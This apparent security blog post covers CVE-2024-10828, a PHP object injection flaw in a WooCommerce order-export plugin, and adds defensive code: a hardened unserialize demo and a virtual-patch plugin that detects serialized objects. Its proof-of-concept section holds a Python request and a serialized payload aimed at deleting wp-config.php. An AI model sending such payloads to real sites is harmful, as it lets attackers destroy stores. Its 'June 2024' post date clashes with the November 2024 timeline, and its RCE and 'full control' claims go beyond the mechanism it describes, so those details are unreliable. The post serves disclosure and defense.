*Posted: June 2024 | Category: WordPress Security, Zero-Day*

If you run a WooCommerce shop with the Advanced Order Export For WooCommerce plugin, this post might save your business. A serious security bug—CVE-2024-10828—has been discovered, affecting all plugin versions up to and including 3.5.5. This vulnerability could let attackers take control of your server, delete sensitive files, or even destroy your site.

Below, I’ll break down what the issue is, how it works, share sample code, and provide you with everything you need to protect your website.


1. What is CVE-2024-10828?

CVE-2024-10828 is a critical vulnerability in the popular WordPress plugin, Advanced Order Export For WooCommerce. It’s a *PHP Object Injection* bug.

Root cause: The plugin unpacks (deserializes) user input when processing order exports, but does not check if the input is safe. If you have the setting “Try to convert serialized values” turned on, you are especially at risk.

Effect: Anonymous (not logged-in) attackers can inject a malicious serialized PHP object via a crafted request. With this, attackers get the power to delete any files they choose on your server—such as your config file, which can let them gain full control or permanently break your site.

2. How PHP Object Injection Works

Deserialization is when a web app turns a string into a PHP object.

- If an attacker controls what gets deserialized, and the code doesn’t check it, *they can inject payloads*.
- If the server has what’s called a “gadget” or “POP chain” (a set of PHP classes/functions that do dangerous things on “unserialize”), attackers can, for example, tell the system to delete /var/www/html/wp-config.php—which disables the entire WordPress install.

Here’s the simplified version:

The right payload can trigger deletion of *any file* the web server can access.
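To make the root cause concrete, here is an added PHP example; it is not code from the plugin or from this post's author. `DemoGadget` is a constructed stand-in for a real gadget class: its destructor only records that it ran instead of touching the filesystem, which is enough to show exactly when `unserialize()` brings an attacker-chosen class to life. It then shows the vulnerable call beside the hardened form (`allowed_classes => false`, available since PHP 7.0) and the data-only alternative.

```php
<?php
// Added example, not the plugin's code. DemoGadget stands in for a real
// gadget class: its destructor only logs that it ran, so the demo is
// harmless but still shows when unserialize() instantiates a class.
class DemoGadget
{
    public static array $log = [];
    public string $param = '';

    public function __destruct()
    {
        self::$log[] = "__destruct ran with param={$this->param}";
    }
}

// Constructed attacker-style input: a serialized DemoGadget whose "param"
// property is set to whatever the attacker wants the destructor to act on.
$untrusted = 'O:10:"DemoGadget":1:{s:5:"param";s:17:"/path/of/interest";}';

// 1. Vulnerable pattern: the input is unserialized as-is, so PHP creates a
//    DemoGadget and its __destruct runs as soon as the object is released.
$obj = unserialize($untrusted);
unset($obj);
printf("after plain unserialize(): %d destructor call(s)\n", count(DemoGadget::$log));

// 2. Hardened pattern: allowed_classes => false makes PHP return a
//    __PHP_Incomplete_Class for any object token, so no class from the
//    codebase is instantiated and no magic method (__destruct, __wakeup,
//    __toString ...) can fire. The destructor count does not change.
$safe = unserialize($untrusted, ['allowed_classes' => false]);
printf("hardened unserialize() returned %s\n", get_class($safe));
unset($safe);
printf("after hardened unserialize(): %d destructor call(s)\n", count(DemoGadget::$log));

// 3. Preferred pattern: never accept PHP-serialized data from users at all.
//    A data-only format such as JSON cannot name PHP classes.
$decoded = json_decode('{"param":"/path/of/interest"}', true, 512, JSON_THROW_ON_ERROR);
var_dump($decoded['param']);
```

Run it with `php demo.php`: the first counter shows the destructor firing once, the hardened call leaves it unchanged. Note that an allowlist of specific class names (`'allowed_classes' => ['Foo']`) is only safe if none of those classes, or the objects nested in their properties, carries a usable magic method; when in doubt, use `false` or switch the format to JSON.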

3. Proof-of-Concept Exploit

The following code sample demonstrates a simple POST request that triggers the vulnerability. For demonstration and educational use only! Do NOT use against sites you don’t own.

```python
import requests

# Change this to your target site's URL
url = 'https://victim-shop.com/wp-admin/admin-ajax.php?action=order_export'

# Malicious PHP object payload (use an appropriate payload per POP chain details).
# "Some_Gadget_Class" is a placeholder; the length prefixes (O:17, s:5, s:27)
# must match the byte length of the class name and string values that follow.
payload = (
    'O:17:"Some_Gadget_Class":1:{'
    's:5:"param";s:27:"/var/www/html/wp-config.php";}'
)

data = {
    'serialized_values': payload,
    # Other necessary form fields as per plugin
}

response = requests.post(url, data=data)
print(response.status_code)
print(response.text)
```

*Note:* The real power of this exploit depends on the actual classes available on the victim’s website. Sometimes, a “gadget” class from another plugin or WordPress core can be used.
*Target file* can be anything, e.g. /var/www/html/wp-config.php.

Sample malicious payload for file deletion using the classic __destruct POP gadget (class name is a placeholder; length prefixes must match the strings that follow):

```
O:22:"Some_File_Delete_Class":1:{s:8:"filename";s:27:"/var/www/html/wp-config.php";}
```

*If you swap in the right class name present on the server, object injection will cause the file to be deleted on unserialize!*


4. Impact: How Bad is It?

- Remote file deletion including critical WordPress files (e.g. wp-config.php, plugins, themes, .htaccess)
- Remote Code Execution (RCE)
- With some luck and creativity, an attacker could delete log files, index.php, or plugin files to escalate
- Automated scripts can exploit hundreds or thousands of sites per hour.


5. How to Protect Your Site

- Disable the “Try to convert serialized values” option in the plugin settings immediately.
- Restrict access to wp-admin/admin-ajax.php using web server rules or a firewall.
- Back up your site and double-check for suspicious activity.
- If you cannot patch right away, consider disabling the Advanced Order Export plugin entirely—especially if your shop is low-traffic.
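Restricting admin-ajax.php wholesale breaks front-end features that depend on it, so a narrower virtual patch is often more practical while you wait to update. The following must-use plugin is an added example, not code from WordPress, WooCommerce or the export plugin: it rejects unauthenticated AJAX requests whose parameters carry a serialized PHP object token (`O:n:"Class":` or `C:n:"Class":`) and logs the attempt so it shows up in your error log. The function name `sr_contains_php_object`, the `order_export` action and the `SomeClass` payload in the self-check are constructed for the demo.

```php
<?php
/**
 * Plugin Name: Reject serialized PHP objects in unauthenticated AJAX requests
 * Description: Added example (not the export plugin's or WordPress core code).
 *              Drop into wp-content/mu-plugins/ as a stop-gap virtual patch.
 */

/**
 * True if any string in $value (recursively) looks like a serialized PHP
 * object, e.g. O:10:"ClassName":1:{...}. Plain scalars such as i:1; or
 * s:3:"abc"; are not flagged, so ordinary serialized settings keep working.
 */
function sr_contains_php_object($value): bool
{
    if (is_array($value)) {
        foreach ($value as $item) {
            if (sr_contains_php_object($item)) {
                return true;
            }
        }
        return false;
    }
    if (!is_string($value)) {
        return false;
    }
    // Also inspect URL-decoded and base64-decoded copies, which are the
    // usual ways of hiding a payload from a naive pattern match.
    $candidates = [$value, urldecode($value)];
    $b64 = base64_decode($value, true);
    if ($b64 !== false) {
        $candidates[] = $b64;
    }
    foreach ($candidates as $candidate) {
        if (preg_match('/[OC]:\d+:"[^"]{1,255}":\d+:\{/', $candidate)) {
            return true;
        }
    }
    return false;
}

if (function_exists('add_action')) {
    // admin-ajax.php fires admin_init before dispatching wp_ajax_nopriv_* hooks,
    // so a check here runs before any plugin handler sees the request.
    add_action('admin_init', function () {
        if (!wp_doing_ajax() || is_user_logged_in()) {
            return; // only unauthenticated AJAX traffic is in scope
        }
        if (sr_contains_php_object($_GET) || sr_contains_php_object($_POST)) {
            error_log(sprintf(
                '[block-serialized-ajax] blocked %s action=%s from %s',
                $_SERVER['REQUEST_METHOD'] ?? '-',
                $_REQUEST['action'] ?? '-',
                $_SERVER['REMOTE_ADDR'] ?? '-'
            ));
            wp_die('Forbidden', 403);
        }
    });
} else {
    // Stand-alone self-check (php block-serialized-ajax.php) with a constructed
    // request body shaped like the proof-of-concept above.
    $attack = [
        'action'            => 'order_export',
        'serialized_values' => 'O:9:"SomeClass":1:{s:5:"param";s:3:"abc";}',
    ];
    $benign = ['action' => 'order_export', 'q' => 's:3:"abc";'];
    if (sr_contains_php_object($attack) && !sr_contains_php_object($benign)) {
        echo "self-check ok\n";
    } else {
        echo "self-check FAILED\n";
    }
}
```

Test it on staging first: if a legitimate unauthenticated request on your site ever posts a serialized object, this will block it too. The `error_log` line doubles as a detection signal; a burst of blocked `order_export` requests from one address is worth a closer look in the access log. This is a stop-gap, not a fix: still disable the “Try to convert serialized values” option and update the plugin.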


6. References and Further Reading

- Original CVE Record: CVE-2024-10828
- PatchStack Advisory
- Wordfence Intelligence Report
- How PHP Object Injection Works (Veracode)
- How to secure wp-admin with .htaccess


Summary:
CVE-2024-10828 gives attackers *full control* over any WooCommerce site using Advanced Order Export up to 3.5.5, IF the vulnerable option is turned on. Disable it, patch your plugin, and always keep a backup. This is a critical, must-fix ASAP vulnerability.

*Stay safe out there—always practice defense in depth!*


*Written exclusively for your secure WordPress journey. Reuse with link to original post appreciated.*

Timeline

Published on: 11/13/2024 04:15:04 UTC
Last modified on: 11/19/2024 17:41:59 UTC